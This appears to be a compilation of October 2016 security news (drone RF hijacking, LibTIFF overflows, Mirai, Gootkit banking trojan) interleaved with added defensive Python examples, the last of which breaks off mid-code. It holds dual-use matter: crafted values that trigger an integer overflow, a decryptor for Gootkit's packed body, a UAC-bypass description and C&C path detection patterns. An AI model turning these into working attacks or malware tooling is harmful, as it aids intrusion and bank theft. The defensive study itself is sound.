It could be very easy to hijack nearly any drone mid-flight using the hardware presented by Trend Micro researcher Jonathan Andersson at the PacSec hacking conference in Japan this week. Andersson, who leads Trend Micro’s TippingPoint DVLab division, presented a small hardware device named Icarus that is able to hijack a variety of popular drones mid-flight; the attacker gains full control of the vehicle by locking the owner out.
According to Andersson, the Icarus box is able to hack into radio-controlled vehicles that run the DSMx radio platform. Unfortunately, the DSMx radio platform is very popular for drones; it is present in vehicles manufactured by many vendors, including Walkera, NineEagles and AirTronics.
“It’s not a jamming system so I am not competing for control via RF power,” Andersson explained to Vulture South.
“Full flight control is achieved with the target experiencing a complete loss of control — it’s a clean switch-over.
“The range of my proof of concept implementation is equal to a standard DSMx radio transmitter, though standard 2.4GHz ISM band amplification can be applied to extend the range.”
The principle behind the Icarus box is simple: the hardware determines the unique shared secret key within the DSMx binding process by monitoring the activity of the component and running a brute-force attack. Once the Icarus box grabs the key, the attacker can send malicious packets to lock the legitimate controller out and send his own commands.
Below is a video PoC of the attack.
“It works against all DSMx based radio systems, which would include drones, airplanes, cars, boats, and so on,” Andersson added.
The only way to protect a drone against this kind of attack is to update the receivers’ firmware, an operation that is not always possible on many drones.
“My guess is that it will not be easy to completely remedy the situation. The manufacturers and partners in the ecosystem sell standalone radio transmitters, models of all kinds, transmitters that come with models and standalone receivers,” Andersson told Ars Technica.
“Only a certain set of standalone transmitters have a firmware upgrade capability, though the fix is needed on the model/receiver side.”
Below are the slides prepared by Andersson.
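What the receiver-side fix Andersson alludes to has to achieve can be shown with a toy model. The following is an added example, not DSMx itself and not Andersson's or any vendor's code: a receiver that trusts a bind id sent in the clear, beside one that accepts only frames carrying an HMAC under the pairing secret and a strictly increasing counter. The frame layout, the 16-byte tag length and the pairing secret are assumptions made for the illustration.

```python
"""Toy model of a radio-control command link: a receiver that trusts a
cleartext bind id versus one that requires an authenticated, replay-protected
frame. Added example; it is not DSMx and not Andersson's code. The frame
layout, the 16-byte HMAC-SHA256 tag and the pairing secret are assumptions."""
import hashlib
import hmac
import struct

FRAME = struct.Struct(">IIhhhh")  # bind id, counter, four channel values (assumed layout)
TAG_LEN = 16                      # truncated HMAC tag length (assumption)


def pack_frame(bind_id: int, counter: int, channels: tuple) -> bytes:
    """Plaintext control frame as a transmitter would send it."""
    return FRAME.pack(bind_id, counter, *channels)


def sign_frame(key: bytes, frame: bytes) -> bytes:
    """Append an HMAC tag computed over every field, so no field can be changed."""
    return frame + hmac.new(key, frame, hashlib.sha256).digest()[:TAG_LEN]


class LegacyReceiver:
    """Accepts any frame carrying the bind id it paired with. Because the bind id
    travels in the clear, anyone who has observed it is accepted as the owner."""

    def __init__(self, bind_id: int):
        self.bind_id = bind_id
        self.last_channels = None

    def accept(self, frame: bytes) -> bool:
        if len(frame) != FRAME.size:
            return False
        bind_id, _counter, *channels = FRAME.unpack(frame)
        if bind_id != self.bind_id:
            return False
        self.last_channels = tuple(channels)
        return True


class AuthenticatedReceiver:
    """Requires a valid tag under the pairing key and a strictly increasing
    counter, which rejects frames from anyone without the key and replays."""

    def __init__(self, bind_id: int, key: bytes):
        self.bind_id = bind_id
        self.key = key
        self.counter = 0
        self.last_channels = None

    def accept(self, signed: bytes) -> bool:
        if len(signed) != FRAME.size + TAG_LEN:
            return False
        frame, tag = signed[:FRAME.size], signed[FRAME.size:]
        expected = hmac.new(self.key, frame, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):   # constant-time comparison
            return False
        bind_id, counter, *channels = FRAME.unpack(frame)
        if bind_id != self.bind_id or counter <= self.counter:
            return False
        self.counter = counter
        self.last_channels = tuple(channels)
        return True


def demo() -> dict:
    """Run both receivers against an owner frame, a third-party frame that
    reuses the observed bind id, a tampered frame and a replayed frame."""
    key = hashlib.sha256(b"constructed pairing secret").digest()  # constructed
    bind_id = 0x1234ABCD                                          # constructed
    legacy = LegacyReceiver(bind_id)
    auth = AuthenticatedReceiver(bind_id, key)

    owner = pack_frame(bind_id, 1, (0, 0, 512, 0))
    other = pack_frame(bind_id, 2, (0, 0, -1024, 0))   # same bind id, no key
    signed_owner = sign_frame(key, owner)
    tampered = bytearray(sign_frame(key, pack_frame(bind_id, 3, (0, 0, 512, 0))))
    tampered[10] ^= 0xFF                                # flip a byte in a channel field

    return {
        "legacy_accepts_owner": legacy.accept(owner),
        "legacy_accepts_other": legacy.accept(other),
        "auth_accepts_owner": auth.accept(signed_owner),
        "auth_rejects_unkeyed": not auth.accept(sign_frame(b"guess", other)),
        "auth_rejects_tampered": not auth.accept(bytes(tampered)),
        "auth_rejects_replay": not auth.accept(signed_owner),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The legacy receiver accepts the second party's frame purely because it repeats the bind id; the authenticated receiver rejects it, rejects a frame whose channel byte was altered after signing, and rejects a replay of a genuine frame because its counter is not fresh. A real link would also need key provisioning at bind time, which is exactly the part Andersson notes must change on the receiver side.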
Three bugs found in LibTIFF, one of them yet to be patched
28.10.2016 securityaffairs Vulnerability
Libtiff library is affected by three vulnerabilities but unfortunately one of them, tracked as CVE-2016-8331, is still unpatched.
Libtiff is a library for reading and writing Tagged Image File Format (TIFF) files, and according to the experts from Cisco Talos it is affected by three vulnerabilities. The bugs could be exploited to compromise a system by using booby-trapped images. The bad news is that only two of the three vulnerabilities have been fixed.
The vulnerabilities affect the latest version 4.0.6, released in September.
CVE-2016-5652 (TALOS-2016-0187) – LibTIFF tiff2pdf JPEG Compression Tables Heap Buffer Overflow
CVE-2016-8331 (TALOS-2016-0190) – LibTIFF FAX IFD Entry Parsing Type Confusion
CVE-2016-5875 (TALOS-2016-0205) – LibTIFF PixarLogDecode Heap Buffer Overflow
The Talos post says the company found the bugs in LibTIFF 4.0.6, released in September.
The LibTIFF FAX IFD Entry Parsing Type Confusion affects LibTIFF’s handling of the BadFaxLines field, which is specific to fax systems; it could be exploited with a specially crafted image that triggers an out-of-bounds memory write, leading to remote code execution. This vulnerability is still unpatched.
“CVE-2016-8331 occurs during the parsing and handling of TIFF images using the LibTIFF API that is present in the standard build. RFC 2306 defines a series of fields used within the TIFF format for use specifically in fax systems which are fully supported by the LibTIFF library.” states the analysis published by Cisco Talos. “The vulnerability exists in the handling of one of these fields, `BadFaxLines`, that can result in a write to out of bounds memory. Attackers can create a specially crafted TIFF file to exploit this vulnerability and execute arbitrary code on affected systems.”
CVE-2016-5652 is a heap buffer overflow that resides in the tiff2pdf tool. Attackers can exploit it with a crafted file that can crash the library.
CVE-2016-5875 is a heap buffer overflow that resides in the way compressed TIFF images in LibTIFF’s PixarLogDecode API are handled.
“To decompress the PixarLog compressed data inside of a TIFF image, LibTIFF uses the Zlib compression library. First, a buffer with the parameters needed to be passed to Zlib are set up with a function call to `PixarLogSetupDecode`. Later this buffer is used when calling the Zlib library function `inflate` which is responsible for the actual decompression. Passing an undersized buffer into the Zlib `inflate` function causes a heap overflow that could be potentially leveraged into remote code execution.”
The vulnerability was reported by Mathias Svensson of Google’s Security Team, and the researcher Even Rouault of Spatialys published a fix on GitHub.
The flawed code in tiff2pdf (CVE-2016-5652) is used to manage JPEG compression for TIFF images.
“TIFF offers support for multiple compression algorithms inside of the image itself. One such algorithm is the JPEG compression. This vulnerability arises in the calculation of the image’s tile size. A specially crafted TIFF image file can lead to an out of bounds write and ultimately to remote code execution. An attacker who can trick a user into using this utility with a crafted TIFF document can cause a heap based buffer overflow that results in remote code execution.” continues the analysis.
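The tile-size arithmetic quoted above is the classic integer-overflow route to an undersized heap buffer. The following added example (not libtiff code) emulates C's 32-bit unsigned multiplication in Python to show a constructed set of image dimensions that wraps the computed tile size to 12 bytes, and the checked multiply that refuses it; the field names and the size formula are assumptions made for the illustration.

```python
"""Checked versus unchecked size arithmetic when sizing a TIFF tile buffer.

Added example; it is not libtiff code. It emulates C's 32-bit unsigned
arithmetic in Python to show how crafted image dimensions wrap the computed
tile size to a small value, so a decoder would allocate a buffer far smaller
than the data it then writes. Field names and the size formula are assumed."""

UINT32_MAX = 0xFFFFFFFF


def mul32_unchecked(a: int, b: int):
    """Silent wraparound, as a plain C uint32_t multiplication behaves."""
    return (a * b) & UINT32_MAX


def mul32_checked(a: int, b: int):
    """Return a*b, or None if the product does not fit in 32 bits. libtiff
    guards its size computations with helpers of this shape (e.g. _TIFFMultiply32)."""
    if a != 0 and b > UINT32_MAX // a:
        return None
    return a * b


def tile_bytes(width: int, length: int, spp: int, bps: int, mul):
    """Bytes needed for one tile: width * length * samples * bytes-per-sample,
    computed with the supplied 32-bit multiply. None means 'refused'."""
    bytes_per_pixel = mul(spp, (bps + 7) // 8)
    if bytes_per_pixel is None:
        return None
    row_bytes = mul(width, bytes_per_pixel)
    if row_bytes is None:
        return None
    return mul(row_bytes, length)


def true_tile_bytes(width: int, length: int, spp: int, bps: int) -> int:
    """The same product with unbounded integers: what the decoder really writes."""
    return width * length * spp * ((bps + 7) // 8)


def decode_tile(tags: dict, mul) -> str:
    """Simulate allocating the tile buffer and then writing the full tile.
    Returns 'rejected' (size check failed), 'overflow' (the write exceeds the
    allocation) or 'ok'."""
    alloc = tile_bytes(tags["width"], tags["length"], tags["spp"], tags["bps"], mul)
    if alloc is None:
        return "rejected"
    needed = true_tile_bytes(tags["width"], tags["length"], tags["spp"], tags["bps"])
    return "overflow" if needed > alloc else "ok"


# Constructed tag sets, not taken from any real sample.
BENIGN = {"width": 256, "length": 256, "spp": 3, "bps": 8}
# 0x40000001 * 3 = 0xC0000003 still fits; * 4 = 0x30000000C wraps to 12 bytes.
CRAFTED = {"width": 0x40000001, "length": 4, "spp": 3, "bps": 8}

if __name__ == "__main__":
    for name, tags in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(name, "unchecked:", decode_tile(tags, mul32_unchecked),
              "checked:", decode_tile(tags, mul32_checked))
```

With the unchecked multiply the crafted tags yield a 12-byte allocation for a tile that is really 12 GiB, which is the "overflow" outcome; with the checked multiply the same tags are refused before any allocation, which is the behaviour a parser of untrusted image headers needs at every size computation, not just this one.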
DDoS under the microscope: What is really behind one of the biggest attacks of recent years?
28.10.2016 SecurityWorld Computer attack
Friday's attack on DNS provider Dyn made many major websites unavailable, among them Twitter, Spotify and GitHub, as well as news portals such as the New York Times. It was a classic DDoS attack using many hacked Internet of Things devices.
The massive outage came from hackers using approximately 100,000 devices infected with the notorious Mirai malware, which is capable of taking control of devices running a Unix-like environment, such as cameras, DVR players and so on, Dyn says.
“We can confirm that a significant volume of traffic came from botnets hacked with the Mirai code,” the company stated on its blog.
It was already believed earlier that botnets created through Mirai were at least partly behind the attacks; Wednesday's report, however, confirms that Mirai was responsible for the majority of the distributed DoS attack.
Another, rather frightening finding is that the hackers apparently held back. Companies have tracked the spread of some Mirai variants to more than 500,000 devices, achieved very easily thanks to weak default passwords.
Given that "only" 100,000 devices were behind Friday's attacks, it is possible that the hackers could mount an even much stronger DDoS attack, says Ofer Gayer, a security engineer at Imperva, a company focused on DDoS mitigation.
“Maybe it was just a warning shot,” he says. “Maybe they knew that this level was enough and that they did not need to deploy their full arsenal.”
Until now, hackers have used DDoS attacks to take down individual websites, often for extortion, says Gayer. Friday's attack on Dyn, a key member of the internet infrastructure, is something new.
“Someone really pulled the trigger,” Gayer continues. “They built the biggest botnet, with which they can take down even the biggest targets.”
Besides Friday's incident, Imperva has noticed recent attacks via Mirai botnets on its own website and on its clients' sites. One in August was really big, with traffic reaching 280 Gb/s. “Most companies fall at 10 Gb/s. The biggest ones at 100 Gb/s,” explains Gayer.
Imperva also noticed that many of the observed infected devices could be traced to IP addresses in 164 countries, primarily in Vietnam, Brazil and the United States. Most were CCTV cameras.
Although DDoS attacks are far from new, thanks to Mirai their scale is unprecedented. The recent, highly publicized attack on Brian Krebs, a journalist who focuses on cybersecurity, reached an incredible 665 Gb/s.
It is still unclear who is behind Friday's attack, but according to some security experts it was amateur hackers. At the end of last month the (also unknown) author of the Mirai malware released its source code to the hacking community, so anyone with at least minimal hacking basics can use it.
Although Mirai was behind most of last week's attack, other botnets were also used, says backbone network provider Level 3 Communications. “We saw at least one, possibly two behaviours inconsistent with Mirai,” said the company's chief security officer Dale Drew. According to the company, it is possible that the hackers used several botnets to make tracing harder.
Chinese Hackers won $215,000 for Hacking iPhone and Google Nexus at Mobile Pwn2Own
27.10.2016 thehackernews Security
The Tencent Keen Security Lab team from China has won a total of $215,000 in prize money in the 2016 Mobile Pwn2Own contest run by Trend Micro's Zero Day Initiative (ZDI) in Tokyo, Japan.
Despite the high-security measures implemented in current devices, the well-known Chinese hacking crew successfully hacked both Apple's iPhone 6S and Google's Nexus 6P phones.
Hacking iPhone 6S
For hacking Apple's iPhone 6S, Keen Lab exploited two iOS vulnerabilities – a use-after-free bug in the renderer and a memory corruption flaw in the sandbox – and stole pictures from the device, for which the team was awarded $52,500.
The iPhone 6S exploit successfully worked despite the iOS 10 update rolled out by Apple this week.
Earlier this week, Marco Grassi from Keen Lab was credited by Apple for finding a serious remote code execution flaw in iOS that could compromise a victim's phone by just viewing "a maliciously crafted JPEG" image.
However, Keen Team indicated it was able to make the attack work successfully on iOS 10.1 as well.
The Keen Lab also managed to install a malicious app on the iPhone 6S, but the app did not survive a reboot due to a default configuration setting, which prevented persistence. Still, the ZDI awarded the hackers $60,000 for the vulnerabilities they used in the hack.
Hacking Google's Nexus 6P
For hacking the Nexus 6P, the Keen Lab Team used a combination of two vulnerabilities and other weaknesses in Android and managed to install a rogue application on the Google Nexus 6P phone without user interaction.
The ZDI awarded them a whopping $102,500 for the Nexus 6P hack.
So, of the total potential payout of $375,000 from the Trend Micro's Zero Day Initiative, the Keen Lab Team researchers took home $215,000.
Hackers behind the BLACKGEAR espionage campaign now target Japan
27.10.2016 securityaffairs Cyber
The threat actor behind the Blackgear cyber-espionage campaign that is targeting Japanese entities is the same that hit Taiwan in 2012.
According to security experts from Trend Micro, Japanese organizations were targeted in an espionage campaign dubbed Blackgear.
Attackers behind Blackgear appear to be the same group that targeted users in Taiwan in 2012; they used a well-known strain of malware detected by many security firms as Elirks.
The attack vectors are spear-phishing emails or compromised websites used to serve the malware in watering hole attacks. The compromised websites served a malicious payload that drops decoy documents and downloaders, which in turn fetch the backdoors used by the group (i.e. Elirks and Ymalr).
The researchers noticed that both Elirks and Ymalr use blogging services as command and control (C&C) infrastructure in order to make detection harder, allowing the attackers to keep the location of the actual C&C server hidden and to easily change the server in use.
“BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years. Multiple papers and talks have been released covering this campaign, which used the ELIRKS backdoor when it was first discovered in 2012. It is known for using blogs and microblogging services to hide the location of its actual command-and-control (C&C) servers. This allows an attacker to change the C&C server used quickly by changing the information in these posts.” read the blog post published by TrendMicro.
“Like most campaigns, BLACKGEAR has evolved over time. Our research indicates that it has started targeting Japanese users. “
The researchers speculate that BLACKGEAR has evolved over time and that the threat actors behind the espionage campaign have now moved on to Japan: the decoy documents used in the attacks are now in Japanese, and the blogging services used as part of the C&C infrastructure are based in Japan.
The experts from Palo Alto Networks arrived at the same conclusion after noticing, this summer, cyber attacks against organizations in Japan that presented many similarities with the attacks against targets in Taiwan.
Inside the Gootkit C&C server
27.10.2016 Kaspersky Virus
The Gootkit bot is one of those types of malicious program that rarely attracts much attention from researchers. The reason is its limited propagation and a lack of distinguishing features.
There are some early instances, including on Securelist (here and here), where Gootkit is mentioned in online malware research as a component in bots and Trojans. However, the first detailed analysis was published by researchers around two years ago. That was the first attempt to describe the bot as a standalone malicious program, where it was described as a “new multi-functional backdoor”. The authors of that piece of research put forward the assertion that the bot’s features were borrowed from other Trojans, and also provided a description of some of Gootkit’s key features.
In September 2016, we discovered a new version of Gootkit with a characteristic and instantly recognizable feature: an extra check of the environment variable ‘crackme’ in the downloader’s body. This feature was not present in the early versions. Just as interesting was the fact that we were able to gain access to the bot’s C&C server, including its complete hierarchical tree of folders and files and their contents.
Infection
As was the case earlier, the bot Gootkit is written in NodeJS, and is downloaded to a victim computer via a chain of downloaders. The main purpose of the bot also remained the same – to steal banking data. The new Gootkit version, detected in September, primarily targets clients of European banks, including those in Germany, France, Italy, the Netherlands, Poland, etc.
The Trojan’s main propagation methods are spam messages with malicious attachments and websites containing exploits on infected pages (Rig Exploit Kit). The attachment in the spam messages contained Trojan-Banker.Win32.Tuhkit, the small initial downloader that launched and downloaded the main downloader from the C&C server, which in turn downloaded Gootkit.
Examples of infected pages used to spread the Trojan
While carrying out our research we detected a huge number of versions of the initial downloader used to distribute the Trojan; most of them are detected as Trojan.Win32.Yakes. Some of the loaders were extremely odd, like the one shown below, which clearly stated in its code that it was a loader for Gootkit.
Section of code from one of the initial downloaders
Some versions of Gootkit are also able to launch the main body with administrator privileges bypassing UAC. To do so, the main loader created an SDB file and registered it in the system with the help of the sdbinst.exe utility, after which it launched the bot with elevated privileges without notifying the user.
‘Crackme’ check
The new version of Gootkit is distinct in that it checks the environment variable ‘crackme’ located in the downloader body. It works as follows: the value of the variable is compared to a fixed value. If the two values differ, the bot starts to check if it has been launched in a virtual environment.
Checking the global variable in the downloader’s body
To do so, the bot checks the variable ‘trustedcomp’, just like it did in earlier versions.
Checking the bot’s body for launch in a virtual environment
The Trojan’s main body
The Trojan’s main file includes a NodeJS interpreter and scripts. After unpacking, the scripts look like this:
NodeJS scripts that make up the Trojan’s main body
The scripts shown in the screenshot constitute the main body of the Trojan. Gootkit has about a hundred various scripts, but they are mostly for practical purposes (intermediate data handlers, network communication DLLs, wrapper classes implementations, encoders etc.) and not of much interest.
The Trojan itself is distributed in an encrypted and packed form. Gootkit is encrypted with a simple XOR with a round key; unpacking is performed using standard Windows API tools. The screen below shows the first 255 bytes of the transferred data.
The Trojan’s packed body
The first three DWORDs denote the sizes of the received, unpacked and packed data respectively. One can easily check this by subtracting the third DWORD from the first DWORD, which leaves 12 bytes – i.e., the size of these variables.
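A parser for the header layout just described, as an added example that is not Kaspersky's tooling: it enforces the received minus packed equals 12 consistency check before trusting the sizes, then undoes the XOR. Little-endian DWORDs, a 4-byte rotating XOR key and the sample blob are assumptions constructed here; the subsequent decompression that Gootkit performs with Windows API calls is not modelled, so the function returns the decrypted but still-packed data.

```python
"""Parser for the packed Gootkit body header described above: three DWORDs
(received, unpacked and packed sizes) followed by XOR-encrypted data.

Added example, not Kaspersky's tooling. Little-endian DWORDs are assumed, and
the 4-byte rotating XOR key and the sample blob are constructed here. The
decompression step that Gootkit performs with Windows API calls afterwards is
not modelled; unpack_body returns the decrypted, still-packed data."""
import struct

HEADER = struct.Struct("<III")  # received, unpacked, packed (assumed little-endian)


def xor_round_key(data: bytes, key: bytes) -> bytes:
    """XOR with a repeating key; symmetric, so it both packs and unpacks."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def parse_header(blob: bytes) -> dict:
    """Validate the three sizes against each other and against the blob length.
    The sanity check from the analysis, received - packed == 12, is enforced."""
    if len(blob) < HEADER.size:
        raise ValueError("blob shorter than the 12-byte header")
    received, unpacked, packed = HEADER.unpack_from(blob)
    if received - packed != HEADER.size:
        raise ValueError(f"received-packed = {received - packed}, expected {HEADER.size}")
    if received != len(blob):
        raise ValueError(f"received={received} but blob holds {len(blob)} bytes")
    return {"received": received, "unpacked": unpacked, "packed": packed}


def unpack_body(blob: bytes, key: bytes) -> dict:
    """Header fields plus the XOR-decrypted payload (still compressed)."""
    info = parse_header(blob)
    info["data"] = xor_round_key(blob[HEADER.size:], key)
    return info


def build_sample(packed_plain: bytes, unpacked_size: int, key: bytes) -> bytes:
    """Construct a blob in the described layout from known plaintext (test data)."""
    enc = xor_round_key(packed_plain, key)
    return HEADER.pack(HEADER.size + len(enc), unpacked_size, len(enc)) + enc


# Constructed values; the real key and payload are not on the page.
SAMPLE_KEY = bytes.fromhex("a5c33c5a")
SAMPLE_PLAIN = b"constructed packed NodeJS body bytes"
SAMPLE_BLOB = build_sample(SAMPLE_PLAIN, 4096, SAMPLE_KEY)

if __name__ == "__main__":
    info = unpack_body(SAMPLE_BLOB, SAMPLE_KEY)
    print(info["received"], info["unpacked"], info["packed"])
    print(info["data"])
```

Rejecting a blob whose first DWORD does not match its actual length, or whose header size does not reconcile the received and packed sizes, matters when the parser is run over data carved from memory or network captures: a truncated or mis-carved blob then fails loudly instead of producing garbage that looks decrypted.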
Stealing money
Interception of user data is done the standard way, via web injections into HTTPS traffic (examples of these web injects are shown below). After the data is sent to the C&C server, it is processed by parsers, each of which is associated with the website of a specific bank.
Fragment of parser code
Communication with the C&C
In the version of Gootkit under review, the C&C address is the same as the address from which the Trojan’s main body is downloaded; in earlier versions, these two addresses sometimes differed. While generating a request, the Trojan uses its unique User Agent – any request that does not specify a User Agent will be denied.
The unique GootKit User Agent
Communication with the C&C comes down to the exchange of a pre-defined set of commands, the main ones being:
Request a list of files available to the Trojan (P_FS:FS_READDIR);
Receive those files (P_FS:FS_GETFILE/FS_GET_MULTIPLEFILES);
Receive update for the bot (P_FS:FS_GETFILE);
Obtain screenshot (P_SPYWARE:SP_SCREENSHOT);
Upload list of processes (P_SPYWARE:SP_PROCESSLIST);
Terminate process (P_SPYWARE:SP_PROCESSKILL);
Download modules (P_FS:FS_GETFILE);
Receive web injects (P_SPYWARE:SP_SPYWARE_CONFIG).
The bot’s main commands and sub-commands
The C&C addresses (two or three in number) are hardwired in the loader’s body and can also be saved in the registry. The body of the data packet may vary depending on the request type, but always includes the following variables:
Size of data packet, plus eight;
Check value XORed with a constant;
Command type;
Command sub-type.
In the screen below, the C&C requests registration information from the bot during its first launch.
Request from C&C, example of variables
The response in this case will contain detailed information about the infected computer, including:
Network adapter parameters;
CPU details, amount of RAM;
User name, computer name.
Regardless of the request type, data between the C&C and the bot is exchanged in protobuf format.
When the main body is downloaded, the address that the loader contacts typically ends in one of the following strings:
/rbody32;
/rbody64;
/rbody320.
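The three path suffixes above, together with the observation that the C&C host is the one the body was fetched from, give a simple proxy-log check. The following is an added example, not Kaspersky's tooling, run over a constructed combined-format log as a forward proxy writes it (full request URLs); every address, host and path in the sample is made up. It first flags body downloads, then reports later requests from the same client to the same host (likely C&C traffic) while ignoring other clients that happen to touch that host.

```python
"""Scan proxy log lines for Gootkit body downloads (request paths ending in
/rbody32, /rbody64 or /rbody320) and for later requests from the same client
to the same host, which the analysis above identifies as the C&C address.

Added example, not Kaspersky's tooling. The log format (combined log with full
request URLs, as a forward proxy writes) and every address, host, path and
User-Agent in the sample are constructed."""
import re
from urllib.parse import urlsplit

BODY_SUFFIXES = ("/rbody32", "/rbody64", "/rbody320")
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log, TEST-NET addresses only.
SAMPLE_LOG = """\
192.0.2.10 - - [27/Oct/2016:10:01:02 +0000] "GET http://203.0.113.5/rbody32 HTTP/1.1" 200 51234 "-" "ConstructedUA/1.0"
192.0.2.10 - - [27/Oct/2016:10:01:09 +0000] "POST http://203.0.113.5/beacon HTTP/1.1" 200 412 "-" "ConstructedUA/1.0"
192.0.2.11 - - [27/Oct/2016:10:02:30 +0000] "GET http://www.example.com/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.12 - - [27/Oct/2016:10:03:00 +0000] "GET http://203.0.113.5/rbody320?v=2 HTTP/1.1" 200 51234 "-" "ConstructedUA/1.0"
192.0.2.11 - - [27/Oct/2016:10:04:00 +0000] "GET http://203.0.113.5/ HTTP/1.1" 404 310 "-" "Mozilla/5.0"
"""


def parse(lines):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def scan(lines):
    """Return (body_downloads, followups). Each download is (client, host, path);
    each followup is (client, method, url) to a host that client fetched a body from."""
    records = list(parse(lines))
    downloads, infected = [], set()
    for r in records:
        u = urlsplit(r["url"])
        if u.path.endswith(BODY_SUFFIXES):       # query string is not part of .path
            downloads.append((r["client"], u.hostname, u.path))
            infected.add((r["client"], u.hostname))
    followups = []
    for r in records:
        u = urlsplit(r["url"])
        if (r["client"], u.hostname) in infected and not u.path.endswith(BODY_SUFFIXES):
            followups.append((r["client"], r["method"], r["url"]))
    return downloads, followups


if __name__ == "__main__":
    downloads, followups = scan(SAMPLE_LOG.splitlines())
    for d in downloads:
        print("body download:", d)
    for f in followups:
        print("probable C&C traffic:", f)
```

Keying the follow-up check on the (client, host) pair rather than on the host alone is what keeps the unrelated client 192.0.2.11 out of the report even though it also reached the suspect host; on a real proxy log the host list from the first pass is also the natural input for a block rule.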
Mystery solved…rather easily
We found a configuration error that often appears on botnet C&C servers and took advantage of it to capture a complete tree of folders and files, as well as their contents, from one of the GootKit C&C servers.
Contents of GootKit C&C server
The C&C server contains a number of parsers for different banking sites. These parsers are used (provided the user data is available) to steal money from user accounts and to send notifications via Jabber. The stolen data is stored in text files, with the infected computer’s IP address used as the file name.
Stolen data and logs on the bot’s C&C server
Example of stolen data in one of the text files
Other data (bank transfers and logs) is also stored in text file format.
Parser logs
An analysis of the bot’s web injects and parser logs has shown that the attackers primarily target the clients of German and French banks.
Distribution of web injects across domain zones
Excerpts from parser logs
Analysis of the server content and the parsers made it clear that the botnet’s creator was a Russian speaker. Note the comments in the screen below.
A fragment of script including the author’s comments in Russian
Moreover, Gootkit most probably has just one owner – it’s not for sale anywhere and, regardless of the downloaders’ modifications or type of admin panel, the code in NodeJS (the Trojan’s main body) is always the same.
Examples of Gootkit web injects
Conclusions
Gootkit belongs to a class of Trojans that are extremely tenacious, albeit not very widespread. Because it’s not very common, new versions of the Trojan may remain under the researchers’ radar for long periods.
It should also be noted that using NodeJS as a development platform imposes certain limitations on the authors, but at the same time gives them a substantial degree of flexibility and simplicity when creating new versions of the Trojan.
Kaspersky Lab’s security products detect the Trojan GootKit and all its associated components under the following verdicts:
Trojan-Banker.Win32.Tuhkit (the initial downloader distributed via emails);
Trojan.Win32.Yakes (some modifications of the main downloader);
HEUR:Trojan.Win32.Generic (the bot’s main body, some modifications of the downloader).
MD5
1c89a85c1a268f6abb34fb857f5b1b6f
7521e82162ed175ad68582dd233ab1ae
9339dcb3571dda122b71fb80de55d0d6
b13378ad831a1e4e60536b6a3d155c42
9ba9f48cda9db950feb4fbe10f61353c
People underestimate the security of home routers. Cybercriminals can take them over
27.10.2016 Novinky/Bezpečnost Security
A fresh survey by antivirus company Eset points to an alarming situation in the field of home routers. According to it, people greatly underestimate the security of these gateways to the internet. Out of every seven routers tested, at least one could be attacked successfully. This plays into the hands of cybercriminals, who can take over these network devices remotely.
“The test focused on checking default usernames and passwords and their most commonly used combinations. It is worrying that in one case in seven the attack was successful,” said Peter Stančík, Security Evangelist at Eset.
He also pointed out the main mistake people make when configuring network devices.
“In particular, insecure services such as Telnet should definitely not be open, not even to internal networks, which unfortunately was found in 20 percent of cases,” Stančík added.
Weak passwords, inappropriate settings
The survey further showed that 15 percent of users use weak passwords, most often combined with the preset username “admin”. Around 7% of the tested devices additionally contained a vulnerability that security experts rated as medium or high severity. Port scanning revealed that network services are very often accessible not only from internal but also from external networks.
More than half of the other vulnerabilities stemmed from improperly set access rights. According to the survey, which covered some 12,000 routers, people should also watch out for the abuse of commands by the so-called command injection method.
“It targets the execution of arbitrary commands in the remote operating system through vulnerabilities in applications that do not sufficiently validate their input. Nearly 10% of software vulnerabilities concerned so-called cross-site scripting (XSS), which allows an attacker to change the router configuration so that malicious scripts can be run on the client side,” the security expert states.
What happens when attackers manage to get into a router? Most often they try to redirect internet traffic. Instead of servers such as Seznam or Google, victims see, for example, a message about the need to install a Flash player. Instead of that, another virus is downloaded to the PC. The attackers thus suddenly have access not only to the router but also to the connected computer.
The number of attacks is rising
Cybercriminals are increasingly targeting the gateways to the internet. They exploit the fact that users, especially in households, greatly underestimate the security of these devices, and sometimes this applies to companies too. The March Cisco Annual Security Report study showed that nine out of ten internet devices have weak spots.
The main problem, according to security experts, is that routers cannot be protected with antivirus programs as computers can. Even so, users are not completely defenceless. The solution is to always download the latest updates and security patches, as well as to configure every network device appropriately.
Less experienced users should nevertheless not attempt to configure routers. An inappropriate setting can cause more harm than good. Paradoxically, they could easily open a back door for attackers.
Friday's Massive DDoS Attack Came from Just 100,000 Hacked IoT Devices
27.10.2016 thehackernews Attack
Guess how many devices participated in last Friday's massive DDoS attack against DNS provider Dyn that caused vast internet outage?
Just 100,000 devices.
I did not miss any zeros.
Dyn disclosed on Wednesday that a botnet of an estimated 100,000 internet-connected devices was hijacked to flood its systems with unwanted requests and close down the Internet for millions of users.
Dyn executive vice president Scott Hilton has issued a statement, saying all compromised devices have been infected with a notorious Mirai malware that has the ability to take over cameras, DVRs, and routers.
"We're still working on analyzing the data but the estimate at the time of this report is up to 100,000 malicious endpoints," Hilton said. "We are able to confirm that a significant volume of attack traffic originated from Mirai-based botnets."
Mirai malware scans for Internet of Things (IoT) devices that are still using their default passwords and then enslaves those devices into a botnet, which is then used to launch DDoS attacks.
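Mirai's sweep for telnet logins leaves a recognizable trace in perimeter logs: one source sending SYNs to the telnet ports on many distinct hosts. The following is an added example, not Dyn's or any vendor's detection logic, run over constructed iptables-style kernel log lines (TEST-NET addresses); treating TCP 23 and 2323 as the telnet ports and three distinct targets as the threshold are assumptions made for the illustration.

```python
"""Flag hosts that behave like Mirai's scanner: TCP SYNs to the telnet ports
across many distinct destinations, found in iptables-style kernel log lines.

Added example, not Dyn's or any vendor's production detection. Ports 23 and
2323 are the assumption used for 'telnet ports'; the log lines and all
addresses are constructed (TEST-NET ranges)."""
import re
from collections import defaultdict

TELNET_PORTS = {23, 2323}
SYN_RE = re.compile(
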